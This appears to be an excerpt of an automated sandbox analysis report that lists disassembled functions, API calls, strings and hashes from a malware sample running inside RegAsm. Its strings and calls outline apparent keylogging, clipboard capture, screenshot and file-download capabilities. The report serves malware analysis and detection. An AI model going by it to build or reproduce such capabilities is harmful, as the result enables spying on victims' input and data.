                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                • String ID:
                                                                • API String ID: 188215759-0
                                                                • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 1000655C
                                                                  • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                  • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                  • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                • String ID: *?$.
                                                                • API String ID: 2667617558-3972193922
                                                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/jpeg
                                                                • API String ID: 1291196975-3785015651
                                                                • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                                  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                                  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                  • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/png
                                                                • API String ID: 1291196975-2966254431
                                                                • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID: : $Se.
                                                                • API String ID: 4218353326-4089948878
                                                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: alarm.wav$hYG
                                                                • API String ID: 1174141254-2782910960
                                                                • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
